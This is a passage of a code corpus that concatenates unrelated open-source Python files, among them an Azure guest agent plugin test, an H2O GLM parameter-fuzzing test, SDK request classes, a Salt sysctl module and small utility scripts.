class AzureGuestAgentPluginTest(unittest.TestCase):
def setUp(self):
self.mock_wmi = mock.MagicMock()
self._moves_mock = mock.MagicMock()
patcher = mock.patch.dict(
"sys.modules",
{
"wmi": self.mock_wmi,
"six.moves": self._moves_mock
}
)
patcher.start()
self.addCleanup(patcher.stop)
self._winreg_mock = self._moves_mock.winreg
self._azureguestagent = importlib.import_module(MODPATH)
self._azureagentplugin = self._azureguestagent.AzureGuestAgentPlugin()
self.snatcher = testutils.LogSnatcher(MODPATH)
def test_check_delete_service(self):
mock_osutils = mock.Mock()
mock_service_name = mock.sentinel.name
self._azureagentplugin._check_delete_service(mock_osutils,
mock_service_name)
mock_osutils.check_service_exists.assert_called_once_with(
mock_service_name)
mock_osutils.get_service_status.assert_called_once_with(
mock_service_name)
mock_osutils.stop_service.assert_called_once_with(mock_service_name,
wait=True)
mock_osutils.delete_service.assert_called_once_with(mock_service_name)
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._check_delete_service")
def test_remove_agent_services(self, mock_check_delete_service):
mock_osutils = mock.Mock()
expected_logs = ["Stopping and removing any existing Azure guest "
"agent services"]
with self.snatcher:
self._azureagentplugin._remove_agent_services(mock_osutils)
self.assertEqual(self.snatcher.output, expected_logs)
self.assertEqual(mock_check_delete_service.call_count, 3)
@mock.patch("shutil.rmtree")
@mock.patch("os.path.exists")
@mock.patch("os.getenv")
def test_remove_azure_dirs(self, mock_os_getenv,
mock_exists, mock_rmtree):
mock_rmtree.side_effect = (None, Exception)
mock_exists.return_value = True
mock_os_getenv.return_value = "fake_path"
with self.snatcher:
self._azureagentplugin._remove_azure_dirs()
mock_os_getenv.assert_called_with("SystemDrive")
self.assertEqual(mock_os_getenv.call_count, 2)
self.assertEqual(mock_exists.call_count, 2)
self.assertEqual(mock_rmtree.call_count, 2)
def test_set_registry_vm_type(self):
vm_type = mock.sentinel.vm
key_name = "SOFTWARE\\Microsoft\\Windows Azure"
self._azureagentplugin._set_registry_vm_type(vm_type)
key = self._winreg_mock.CreateKey.return_value.__enter__.return_value
self._winreg_mock.CreateKey.assert_called_with(
self._winreg_mock.HKEY_LOCAL_MACHINE, key_name)
self._winreg_mock.SetValueEx.assert_called_once_with(
key, "VMType", 0, self._winreg_mock.REG_SZ, vm_type)
def test_set_registry_ga_params(self):
fake_version = (1, 2, 3, 4)
fake_install_timestamp = datetime.datetime.now()
key_name = "SOFTWARE\\Microsoft\\GuestAgent"
self._azureagentplugin._set_registry_ga_params(fake_version,
fake_install_timestamp)
self._winreg_mock.CreateKey.assert_called_with(
self._winreg_mock.HKEY_LOCAL_MACHINE, key_name)
self.assertEqual(self._winreg_mock.SetValueEx.call_count, 2)
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._set_registry_ga_params")
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._set_registry_vm_type")
def test_configure_rd_agent(self, mock_set_registry_vm_type,
mock_set_registry_ga_params):
mock_osutils = mock.Mock()
fake_ga_path = "C:\\"
expected_rd_path = os.path.join(fake_ga_path,
self._azureguestagent.RDAGENT_FILENAME)
expected_path = os.path.join(fake_ga_path, "TransparentInstaller.dll")
self._azureagentplugin._configure_rd_agent(mock_osutils, fake_ga_path)
mock_osutils.create_service.assert_called_once_with(
self._azureguestagent.SERVICE_NAME_RDAGENT,
self._azureguestagent.SERVICE_NAME_RDAGENT,
expected_rd_path,
mock_osutils.SERVICE_START_MODE_MANUAL)
mock_osutils.get_file_version.assert_called_once_with(expected_path)
mock_set_registry_vm_type.assert_called_once_with()
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._run_logman")
def test_stop_event_trace(self, mock_run_logman):
mock_osutils = mock.Mock()
fake_name = mock.sentinel.event_name
res = self._azureagentplugin._stop_event_trace(mock_osutils, fake_name)
mock_run_logman.assert_called_once_with(mock_osutils, "stop",
fake_name, False)
self.assertIsNotNone(res)
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._run_logman")
def test_delete_event_trace(self, mock_run_logman):
mock_osutils = mock.Mock()
fake_name = mock.sentinel.event_name
res = self._azureagentplugin._delete_event_trace(mock_osutils,
fake_name)
mock_run_logman.assert_called_once_with(mock_osutils, "delete",
fake_name)
self.assertIsNotNone(res)
def test_run_logman(self):
mock_osutils = mock.Mock()
fake_action = mock.sentinel.action
fake_name = mock.sentinel.cmd_name
expected_args = ["logman.exe", "-ets", fake_action, fake_name]
mock_osutils.execute_system32_process.return_value = (0, 0, -1)
self._azureagentplugin._run_logman(mock_osutils, fake_action,
fake_name, True)
mock_osutils.execute_system32_process.assert_called_once_with(
expected_args)
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._stop_event_trace")
def test_stop_ga_event_traces(self, mock_stop_event_trace):
mock_osutils = mock.Mock()
expected_logs = ["Stopping Azure guest agent event traces"]
with self.snatcher:
self._azureagentplugin._stop_ga_event_traces(mock_osutils)
self.assertEqual(mock_stop_event_trace.call_count, 4)
self.assertEqual(self.snatcher.output, expected_logs)
@mock.patch(MODPATH + ".AzureGuestAgentPlugin._delete_event_trace")
def test_delete_ga_event_traces(self, mock_delete_event_trace):
mock_osutils = mock.Mock()
expected_logs = ["Deleting Azure guest agent event traces"]
with self.snatcher:
self._azureagentplugin._delete_ga_event_traces(mock_osutils)
self.assertEqual(mock_delete_event_trace.call_count, 2)
self.assertEqual(self.snatcher.output, expected_logs)
@mock.patch("os.path.exists")
def _test_get_guest_agent_source_path(self, mock_exists,
drives=None, exists=False):
mock_osutils = mock.Mock()
mock_exists.return_value = exists
mock_osutils.get_logical_drives.return_value = drives
if not exists:
self.assertRaises(
exception.CloudbaseInitException,
self._azureagentplugin._get_guest_agent_source_path,
mock_osutils)
return
res = self._azureagentplugin._get_guest_agent_source_path(mock_osutils)
self.assertIsNotNone(res)
def test_get_guest_agent_source_path_no_agent(self):
self._test_get_guest_agent_source_path(drives=[])
def test_get_guest_agent_source_path(self):
mock_drive = "C:"
self._test_get_guest_agent_source_path(drives=[mock_drive],
exists=True)
def _test_execute(self,
provisioning_data=None, expected_logs=None):
mock_service = mock.Mock()
mock_sharedata = mock.Mock()
expected_res = (base.PLUGIN_EXECUTION_DONE, False)
(mock_service.get_vm_agent_package_provisioning_data.
return_value) = provisioning_data
if not provisioning_data or not provisioning_data.get("provision"):
with self.snatcher:
res = self._azureagentplugin.execute(mock_service,
mock_sharedata)
(mock_service.get_vm_agent_package_provisioning_data.
assert_called_once_with())
self.assertEqual(res, expected_res)
self.assertEqual(self.snatcher.output, expected_logs)
return
def test_execute_no_data(self):
expected_logs = ["Azure guest agent provisioning data not present"]
self._test_execute(expected_logs=expected_logs)
def test_execute_no_provision(self):
mock_data = {"provision": None}
expected_logs = ["Skipping Azure guest agent provisioning "
"as by metadata request"]
self._test_execute(provisioning_data=mock_data,
expected_logs=expected_logs)
def test_get_os_requirements(self):
expected_res = ('win32', (6, 1))
res = self._azureagentplugin.get_os_requirements()
self.assertEqual(res, expected_res)
|
lldb/packages/Python/lldbsuite/test/lang/cpp/thread_local/TestThreadLocal.py | medismailben/llvm-project | 456 | 12719042 | <gh_stars>100-1000
from lldbsuite.test import lldbinline
from lldbsuite.test import decorators
lldbinline.MakeInlineTest(__file__, globals(),
lldbinline.expectedFailureAll(oslist=[
"windows", "linux", "netbsd"]))
|
example/example_brotli_project.py | dish59742/brotlicffi | 111 | 12719066 | """A simple project that is compatible with both
'brotli' C bindings and 'brotlicffi' CFFI bindings
"""
import sys
try:
import brotlicffi as brotli
except ImportError:
import brotli
def main():
data = sys.argv[1].encode("utf-8")
print(f"Compressing data: {data}")
compressor = brotli.Compressor(mode=brotli.MODE_TEXT)
compressed = compressor.process(data) + compressor.finish()
print(f"Compressed data: {compressed}")
decompressor = brotli.Decompressor()
decompressed = decompressor.process(compressed) + decompressor.finish()
print(f"Decompressed data: {decompressed}")
if __name__ == "__main__":
main()
|
h2o-py/tests/testdir_algos/glm/pyunit_random_attack_medium.py | ahmedengu/h2o-3 | 6,098 | 12719087 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from __future__ import print_function
import h2o
from tests import pyunit_utils
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
import random
def random_attack():
def cointoss():
return random.randint(0, 1)
def attack(family, train, valid, x, y):
kwargs = {}
kwargs["family"] = family
gaussian_links = ["inverse", "log", "identity"]
binomial_links = ["logit"]
poisson_links = ["log", "identity"]
gamma_links = ["inverse", "log", "identity"]
# randomly select parameters and their corresponding values
if cointoss(): kwargs["max_iterations"] = random.randint(1, 50)
if random.random() > 0.8: kwargs["beta_epsilon"] = random.random()
if cointoss(): kwargs["solver"] = ["AUTO", "IRLSM", "L_BFGS", "COORDINATE_DESCENT_NAIVE",
"COORDINATE_DESCENT"][cointoss()]
if cointoss(): kwargs["standardize"] = [True, False][cointoss()]
if cointoss():
if family == "gaussian": kwargs["link"] = gaussian_links[random.randint(0, 2)]
elif family == "binomial": kwargs["link"] = binomial_links[0]
elif family == "poisson": kwargs["link"] = poisson_links[cointoss()]
elif family == "gamma": kwargs["link"] = gamma_links[random.randint(0, 2)]
if cointoss(): kwargs["alpha"] = [random.random()]
if family == "binomial":
if cointoss(): kwargs["prior"] = random.random()
if cointoss(): kwargs["lambda_search"] = [True, False][cointoss()]
if "lambda_search" in list(kwargs.keys()):
if cointoss(): kwargs["nlambdas"] = random.randint(2, 10)
do_validation = [True, False][cointoss()]
# beta constraints
if cointoss():
bc = []
for n in x:
if train[n].isnumeric()[0]:
name = train.names[n]
lower_bound = random.uniform(-1, 1)
upper_bound = lower_bound + random.random()
bc.append([name, lower_bound, upper_bound])
if len(bc) > 0:
beta_constraints = h2o.H2OFrame(bc)
beta_constraints.set_names(["names", "lower_bounds", "upper_bounds"])
kwargs["beta_constraints"] = beta_constraints
# display the parameters and their corresponding values
print("-----------------------")
print("x: {0}".format(x))
print("y: {0}".format(y))
print("validation: {0}".format(do_validation))
for k, v in kwargs.items():
if k == "beta_constraints":
print(k + ": ")
beta_constraints.show()
else:
print(k + ": {0}".format(v))
if do_validation:
# h2o.glm(x=train[x], y=train[y], validation_x=valid[x], validation_y=valid[y], **kwargs)
H2OGeneralizedLinearEstimator(**kwargs).train(x=x, y=y, training_frame=train, validation_frame=valid)
else:
# h2o.glm(x=train[x], y=train[y], **kwargs)
H2OGeneralizedLinearEstimator(**kwargs).train(x=x, y=y, training_frame=train)
print("-----------------------")
print("Import and data munging...")
seed = random.randint(1, 10000)
print("SEED: {0}".format(seed))
pros = h2o.upload_file(pyunit_utils.locate("smalldata/prostate/prostate.csv.zip"))
pros[1] = pros[1].asfactor()
r = pros[0].runif(seed=seed) # a column of length pros.nrow with values between 0 and 1
# ~80/20 train/validation split
pros_train = pros[r > .2]
pros_valid = pros[r <= .2]
cars = h2o.upload_file(pyunit_utils.locate("smalldata/junit/cars.csv"))
r = cars[0].runif(seed=seed)
cars_train = cars[r > .2]
cars_valid = cars[r <= .2]
print()
print("======================================================================")
print("============================== Binomial ==============================")
print("======================================================================")
for i in range(10):
attack("binomial", pros_train, pros_valid, random.sample([2, 3, 4, 5, 6, 7, 8], random.randint(1, 7)), 1)
print()
print("======================================================================")
print("============================== Gaussian ==============================")
print("======================================================================")
for i in range(10):
attack("gaussian", cars_train, cars_valid, random.sample([2, 3, 4, 5, 6, 7], random.randint(1, 6)), 1)
print()
print("======================================================================")
print("============================== Poisson ==============================")
print("======================================================================")
for i in range(10):
attack("poisson", cars_train, cars_valid, random.sample([1, 3, 4, 5, 6, 7], random.randint(1, 6)), 2)
print()
print("======================================================================")
print("============================== Gamma ==============================")
print("======================================================================")
for i in range(10):
attack("gamma", pros_train, pros_valid, random.sample([1, 2, 3, 5, 6, 7, 8], random.randint(1, 7)), 4)
if __name__ == "__main__":
pyunit_utils.standalone_test(random_attack)
else:
random_attack()
|
core/models/utils.py | zuimeiyujianni/MobileStyleGAN.pytorch | 540 | 12719092 | import torch
class NoiseManager:
def __init__(self, noise, device, trace_model=False):
self.device = device
self.noise_lut = {}
if noise is not None:
for i in range(len(noise)):
if not None in noise:
self.noise_lut[noise[i].size(-1)] = noise[i]
self.trace_model = trace_model
def __call__(self, size, b=1):
if self.trace_model:
return None if b == 1 else [None] * b
if size in self.noise_lut:
return self.noise_lut[size]
else:
return torch.randn(b, 1, size, size).to(self.device)
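
# Usage sketch (illustrative): cache fixed per-resolution noise when provided,
# otherwise sample fresh noise on demand.
#
#   manager = NoiseManager(noise=None, device="cpu")
#   z = manager(64, b=4)  # torch.Size([4, 1, 64, 64])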
|
37_First_Neural_Style_Transfer/01_float32/03_weight_quantization.py | khanfarhan10/PINTO_model_zoo | 1,529 | 12719095 | ### tensorflow==2.2.0
import tensorflow as tf
# Weight Quantization - Input/Output=float32
converter = tf.lite.TFLiteConverter.from_saved_model('saved_model_mosaic')
converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS,tf.lite.OpsSet.SELECT_TF_OPS]
tflite_quant_model = converter.convert()
with open('mosaic_224_weight_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Weight Quantization complete! - mosaic_224_weight_quant.tflite")
|
gen/tests/conftest.py | makkes/dcos | 2,577 | 12719099 | import os
import pytest
import dcos_installer.config_util
@pytest.fixture(autouse=True)
def mock_installer_latest_complete_artifact(monkeypatch):
monkeypatch.setattr(
dcos_installer.config_util,
'installer_latest_complete_artifact',
lambda _: {'bootstrap': os.getenv('BOOTSTRAP_ID', '12345'), 'packages': []},
)
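# Illustrative effect of the autouse fixture above (hypothetical snippet): any
# code exercised by a test that calls
# dcos_installer.config_util.installer_latest_complete_artifact(<any config>)
# now receives {'bootstrap': os.getenv('BOOTSTRAP_ID', '12345'), 'packages': []}
# instead of looking up a real release artifact.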
|
dwitter/templatetags/to_gravatar_url.py | moonrisewarrior/dwitter | 714 | 12719104 | import hashlib
from django import template
register = template.Library()
@register.filter
def to_gravatar_url(email):
return ('https://gravatar.com/avatar/%s?d=retro' %
hashlib.md5((email or '').strip().lower().encode('utf-8')).hexdigest())
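# Template usage sketch (assumes the app is in INSTALLED_APPS so the tag
# library can be loaded by its module name):
#
#     {% load to_gravatar_url %}
#     <img src="{{ user.email|to_gravatar_url }}" alt="avatar">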
|
shub/version.py | PyExplorer/shub | 111 | 12719152 | from __future__ import absolute_import
import click
import shub
@click.command(help="Show shub version")
def cli():
click.echo(shub.__version__)
|
aliyun-python-sdk-gdb/aliyunsdkgdb/request/v20190903/CreateDBInstanceRequest.py | yndu13/aliyun-openapi-python-sdk | 1,001 | 12719161 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkgdb.endpoint import endpoint_data
class CreateDBInstanceRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'gdb', '2019-09-03', 'CreateDBInstance','gds')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_ClientToken(self):
return self.get_query_params().get('ClientToken')
def set_ClientToken(self,ClientToken):
self.add_query_param('ClientToken',ClientToken)
def get_DBInstanceCategory(self):
return self.get_query_params().get('DBInstanceCategory')
def set_DBInstanceCategory(self,DBInstanceCategory):
self.add_query_param('DBInstanceCategory',DBInstanceCategory)
def get_DBNodeStorageType(self):
return self.get_query_params().get('DBNodeStorageType')
def set_DBNodeStorageType(self,DBNodeStorageType):
self.add_query_param('DBNodeStorageType',DBNodeStorageType)
def get_DBInstanceDescription(self):
return self.get_query_params().get('DBInstanceDescription')
def set_DBInstanceDescription(self,DBInstanceDescription):
self.add_query_param('DBInstanceDescription',DBInstanceDescription)
def get_AutoRenewPeriod(self):
return self.get_query_params().get('AutoRenewPeriod')
def set_AutoRenewPeriod(self,AutoRenewPeriod):
self.add_query_param('AutoRenewPeriod',AutoRenewPeriod)
def get_Period(self):
return self.get_query_params().get('Period')
def set_Period(self,Period):
self.add_query_param('Period',Period)
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_OwnerAccount(self):
return self.get_query_params().get('OwnerAccount')
def set_OwnerAccount(self,OwnerAccount):
self.add_query_param('OwnerAccount',OwnerAccount)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
def get_UsedTime(self):
return self.get_query_params().get('UsedTime')
def set_UsedTime(self,UsedTime):
self.add_query_param('UsedTime',UsedTime)
def get_DBInstanceClass(self):
return self.get_query_params().get('DBInstanceClass')
def set_DBInstanceClass(self,DBInstanceClass):
self.add_query_param('DBInstanceClass',DBInstanceClass)
def get_VSwitchId(self):
return self.get_query_params().get('VSwitchId')
def set_VSwitchId(self,VSwitchId):
self.add_query_param('VSwitchId',VSwitchId)
def get_SecurityIPList(self):
return self.get_query_params().get('SecurityIPList')
def set_SecurityIPList(self,SecurityIPList):
self.add_query_param('SecurityIPList',SecurityIPList)
def get_DBNodeStorage(self):
return self.get_query_params().get('DBNodeStorage')
def set_DBNodeStorage(self,DBNodeStorage):
self.add_query_param('DBNodeStorage',DBNodeStorage)
def get_DBInstanceNetworkType(self):
return self.get_query_params().get('DBInstanceNetworkType')
def set_DBInstanceNetworkType(self,DBInstanceNetworkType):
self.add_query_param('DBInstanceNetworkType',DBInstanceNetworkType)
def get_AutoRenew(self):
return self.get_query_params().get('AutoRenew')
def set_AutoRenew(self,AutoRenew):
self.add_query_param('AutoRenew',AutoRenew)
def get_DBInstanceVersion(self):
return self.get_query_params().get('DBInstanceVersion')
def set_DBInstanceVersion(self,DBInstanceVersion):
self.add_query_param('DBInstanceVersion',DBInstanceVersion)
def get_VPCId(self):
return self.get_query_params().get('VPCId')
def set_VPCId(self,VPCId):
self.add_query_param('VPCId',VPCId)
def get_ZoneId(self):
return self.get_query_params().get('ZoneId')
def set_ZoneId(self,ZoneId):
self.add_query_param('ZoneId',ZoneId)
def get_PayType(self):
return self.get_query_params().get('PayType')
def set_PayType(self,PayType):
self.add_query_param('PayType',PayType) |
scripts/readHeader.py | andrei-markeev/ts2c | 1,097 | 12719181 | #!/usr/bin/python
import sys
import CppHeaderParser
import json
import pprint
import re
cppHeader = CppHeaderParser.CppHeader(sys.argv[1])
#pp = pprint.PrettyPrinter(indent=4)
#pp.pprint(cppHeader)
#sys.exit(0)
def convertType(type):
if type == "int":
return "number"
elif type == "const char *":
return "string"
elif type == "void":
return "void"
elif type[0:6] == "struct":
return re.sub(r'\s*\*\s*$','',type[7:])
else:
return ""
for func in cppHeader.functions:
params = []
for index, param in enumerate(func["parameters"]):
name = param["name"] or "p" + str(index + 1)
type = convertType(param["type"])
annotation = "" if type else "/** @ctype " + param["type"] + " */ "
params.append(annotation + name + (": " + type if type else ""))
name = func["name"]
type = convertType(func["rtnType"])
annotation = "" if type else "/** @ctype " + func["rtnType"] + " */\n"
func_s = "\n" + annotation + "function " + func["name"] + "(" + ", ".join(params) + ")" + (": " + type if type else "")
print("%s"%func_s) |
pyautogui__keyboard__examples/hotkey_change_state.py | DazEB2/SimplePyScripts | 117 | 12719245 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
RUN_COMBINATION = 'Ctrl+Shift+R'
QUIT_COMBINATION = 'Ctrl+Shift+T'
AUTO_ATTACK_COMBINATION = 'Ctrl+Shift+Space'
BOT_DATA = {
'AUTO_ATTACK': False,
}
def change_auto_attack():
BOT_DATA['AUTO_ATTACK'] = not BOT_DATA['AUTO_ATTACK']
print('AUTO_ATTACK:', BOT_DATA['AUTO_ATTACK'])
print('Press "{}" for RUN'.format(RUN_COMBINATION))
print('Press "{}" for QUIT'.format(QUIT_COMBINATION))
print('Press "{}" for AUTO_ATTACK'.format(AUTO_ATTACK_COMBINATION))
import time
import os
import keyboard
keyboard.add_hotkey(QUIT_COMBINATION, lambda: print('Quit by {}'.format(QUIT_COMBINATION)) or os._exit(0))
keyboard.add_hotkey(AUTO_ATTACK_COMBINATION, change_auto_attack)
keyboard.wait(RUN_COMBINATION)
print('Start')
i = 1
while True:
print(i, 'AUTO_ATTACK:', BOT_DATA['AUTO_ATTACK'])
time.sleep(1)
i += 1
|
salt/_modules/metalk8s_sysctl.py | SaintLoong/metalk8s | 255 | 12719263 | # -*- coding: utf-8 -*-
"""
Execution module to handle MetalK8s sysctl.
"""
import configparser
import pathlib
from salt.exceptions import CommandExecutionError
import salt.utils.files
__virtualname__ = "metalk8s_sysctl"
# Order in this list defines the precedence
SYSCTL_CFG_DIRECTORIES = [
"/run/sysctl.d",
"/etc/sysctl.d",
"/usr/local/lib/sysctl.d",
"/usr/lib/sysctl.d",
"/lib/sysctl.d",
]
# This file is applied last no matter what
SYSCTL_DEFAULT_CFG = "/etc/sysctl.conf"
def __virtual__():
return __virtualname__
def _get_sysctl_files(config):
"""
Return all the sysctl configuration files ordered as they are
read by the system.
    Inject the configuration file passed as the `config` argument into this
    list, in case this file does not exist yet.
    If the `config` file is not in an authorized path (see
    `SYSCTL_CFG_DIRECTORIES` and `SYSCTL_DEFAULT_CFG`), or is overwritten by a
    file with the same name but higher precedence, it is ignored, as the
    system will not take it into account anyway.
"""
config_path = pathlib.Path(config).resolve()
files = {}
for directory in SYSCTL_CFG_DIRECTORIES:
path = pathlib.Path(directory)
if path == config_path.parent:
files.setdefault(config_path.name, str(config_path))
for cfg in path.glob("*.conf"):
files.setdefault(cfg.name, str(cfg))
sorted_files = [files[name] for name in sorted(files)]
sorted_files.append(SYSCTL_DEFAULT_CFG)
return sorted_files
def has_precedence(name, value, config, strict=False):
"""
    Read all sysctl configuration files to check that the passed `name` and
    `value` are not overwritten by an already existing sysctl configuration
    file.
If `strict` is set, check that the final value comes from the passed
`config` and not another sysctl configuration file (even if the value is
equal to `value`).
"""
sysctl_files = _get_sysctl_files(config)
# Ignore files before the `config` one.
try:
sysctl_files = sysctl_files[sysctl_files.index(config) + 1 :]
except ValueError:
        # If the file is not in the list, it means it is overwritten by
        # another sysctl configuration file with higher precedence.
config_name = pathlib.PurePath(config).name
for sysctl_file in sysctl_files:
sysctl_name = pathlib.PurePath(sysctl_file).name
if sysctl_name == config_name:
raise CommandExecutionError( # pylint: disable=raise-missing-from
"'{0}' has a higher precedence and overrides '{1}'".format(
sysctl_file, config
)
)
# The target file is not in a directory checked by the system
raise CommandExecutionError( # pylint: disable=raise-missing-from
"{0} is not a correct path for a sysctl configuration "
"file, please use one of the following:\n- {1}".format(
config, "\n- ".join(SYSCTL_CFG_DIRECTORIES)
)
)
parser = configparser.ConfigParser(interpolation=None)
epured_value = " ".join(str(value).split())
for sysctl_file in sysctl_files:
with salt.utils.files.fopen(sysctl_file, "r") as sysctl_fd:
parser.read_file(["[global]", *sysctl_fd], source=sysctl_file)
sysctl = dict(parser.items("global"))
parser.remove_section("global")
if name in sysctl and (
strict or " ".join(sysctl[name].split()) != epured_value
):
raise CommandExecutionError(
"'{0}' redefines '{1}' with value '{2}'".format(
sysctl_file, name, sysctl[name]
)
)
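# Usage sketch from the salt CLI (target and values are illustrative):
#
#     salt '<node>' metalk8s_sysctl.has_precedence \
#         net.ipv4.ip_forward 1 /etc/sysctl.d/60-metalk8s.conf strict=True
#
# The call raises a CommandExecutionError when another sysctl configuration
# file overrides the requested value, and returns None otherwise.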
|
src/masonite/packages/Package.py | StevenMHernandez/masonite | 1,816 | 12719271 | import os
class Package:
def __init__(self):
self.root_dir = ""
self.name = ""
self.config = ""
self.commands = []
self.views = []
self.migrations = []
self.controller_locations = []
self.routes = []
self.assets = []
def _build_path(self, rel_path):
return os.path.join(self.root_dir, rel_path)
def add_config(self, config_path):
self.config = self._build_path(config_path)
return self
def add_views(self, *locations):
for location in locations:
self.views.append(self._build_path(location))
return self
def add_migrations(self, *migrations):
for migration in migrations:
self.migrations.append(self._build_path(migration))
return self
def add_routes(self, *routes):
for route in routes:
self.routes.append(self._build_path(route))
return self
def add_assets(self, *assets):
for asset in assets:
self.assets.append(self._build_path(asset))
return self
def add_controller_locations(self, *controller_locations):
for loc in controller_locations:
self.controller_locations.append(self._build_path(loc))
return self
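# Builder-style usage sketch (hypothetical paths, resolved relative to root_dir):
if __name__ == "__main__":
    package = Package()
    package.root_dir = "/tmp/demo-package"
    package.name = "demo"
    package.add_config("config/demo.py").add_views("templates").add_migrations(
        "migrations/create_demo_table.py"
    ).add_assets("static")
    print(package.config, package.views, package.migrations, package.assets)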
|
alipay/aop/api/response/AnttechBlockchainSignIndexCreateResponse.py | antopen/alipay-sdk-python-all | 213 | 12719279 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AnttechBlockchainSignIndexCreateResponse(AlipayResponse):
def __init__(self):
super(AnttechBlockchainSignIndexCreateResponse, self).__init__()
self._publish_success = None
@property
def publish_success(self):
return self._publish_success
@publish_success.setter
def publish_success(self, value):
self._publish_success = value
def parse_response_content(self, response_content):
response = super(AnttechBlockchainSignIndexCreateResponse, self).parse_response_content(response_content)
if 'publish_success' in response:
self.publish_success = response['publish_success']
|
src/tools/plot_episode.py | shahid313/embedding-propagation | 184 | 12719298 | import pylab
def plot_episode(episode, classes_first=True):
sample_set = episode["support_set"].cpu()
query_set = episode["query_set"].cpu()
support_size = episode["support_size"]
query_size = episode["query_size"]
if not classes_first:
sample_set = sample_set.permute(1, 0, 2, 3, 4)
query_set = query_set.permute(1, 0, 2, 3, 4)
n, support_size, c, h, w = sample_set.size()
n, query_size, c, h, w = query_set.size()
sample_set = ((sample_set / 2 + 0.5) * 255).numpy().astype('uint8').transpose((0, 3, 1, 4, 2)).reshape((n *h, support_size * w, c))
pylab.imsave('support_set.png', sample_set)
query_set = ((query_set / 2 + 0.5) * 255).numpy().astype('uint8').transpose((0, 3, 1, 4, 2)).reshape((n *h, query_size * w, c))
pylab.imsave('query_set.png', query_set)
# pylab.imshow(query_set)
# pylab.title("query_set")
# pylab.show()
# pylab.savefig('query_set.png')
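# Smoke-test sketch (assumes torch is installed; shapes and sizes are
# illustrative): a 5-way episode with 1 support and 15 query images per class,
# with pixel values already normalized to [-1, 1].
if __name__ == "__main__":
    import torch
    episode = {
        "support_set": torch.rand(5, 1, 3, 32, 32) * 2 - 1,
        "query_set": torch.rand(5, 15, 3, 32, 32) * 2 - 1,
        "support_size": 1,
        "query_size": 15,
    }
    plot_episode(episode, classes_first=True)  # writes support_set.png and query_set.png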
|
nidaqmx/_task_modules/triggers.py | stafak/nidaqmx-python | 252 | 12719326 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import ctypes
import numpy
from nidaqmx._lib import lib_importer, wrapped_ndpointer, ctypes_byte_str
from nidaqmx.system.physical_channel import PhysicalChannel
from nidaqmx.errors import (
check_for_error, is_string_buffer_too_small, is_array_buffer_too_small)
from nidaqmx._task_modules.triggering.arm_start_trigger import ArmStartTrigger
from nidaqmx._task_modules.triggering.handshake_trigger import HandshakeTrigger
from nidaqmx._task_modules.triggering.pause_trigger import PauseTrigger
from nidaqmx._task_modules.triggering.reference_trigger import ReferenceTrigger
from nidaqmx._task_modules.triggering.start_trigger import StartTrigger
from nidaqmx.constants import (
SyncType)
class Triggers(object):
"""
Represents the trigger configurations for a DAQmx task.
"""
def __init__(self, task_handle):
self._handle = task_handle
self._arm_start_trigger = ArmStartTrigger(self._handle)
self._handshake_trigger = HandshakeTrigger(self._handle)
self._pause_trigger = PauseTrigger(self._handle)
self._reference_trigger = ReferenceTrigger(self._handle)
self._start_trigger = StartTrigger(self._handle)
@property
def arm_start_trigger(self):
"""
:class:`nidaqmx._task_modules.triggering.arm_start_trigger.ArmStartTrigger`:
Gets the arm start trigger configurations for the task.
"""
return self._arm_start_trigger
@property
def handshake_trigger(self):
"""
:class:`nidaqmx._task_modules.triggering.handshake_trigger.HandshakeTrigger`:
Gets the handshake trigger configurations for the task.
"""
return self._handshake_trigger
@property
def pause_trigger(self):
"""
:class:`nidaqmx._task_modules.triggering.pause_trigger.PauseTrigger`:
Gets the pause trigger configurations for the task.
"""
return self._pause_trigger
@property
def reference_trigger(self):
"""
:class:`nidaqmx._task_modules.triggering.reference_trigger.ReferenceTrigger`:
Gets the reference trigger configurations for the task.
"""
return self._reference_trigger
@property
def start_trigger(self):
"""
:class:`nidaqmx._task_modules.triggering.start_trigger.StartTrigger`:
Gets the start trigger configurations for the task.
"""
return self._start_trigger
@property
def sync_type(self):
"""
:class:`nidaqmx.constants.SyncType`: Specifies the role of the
device in a synchronized system. Setting this value to
**SyncType.MASTER** or **SyncType.SLAVE** enables trigger
skew correction. If you enable trigger skew correction, set
this property to **SyncType.MASTER** on only one device, and
set this property to **SyncType.SLAVE** on the other
devices.
"""
val = ctypes.c_int()
cfunc = lib_importer.windll.DAQmxGetTriggerSyncType
if cfunc.argtypes is None:
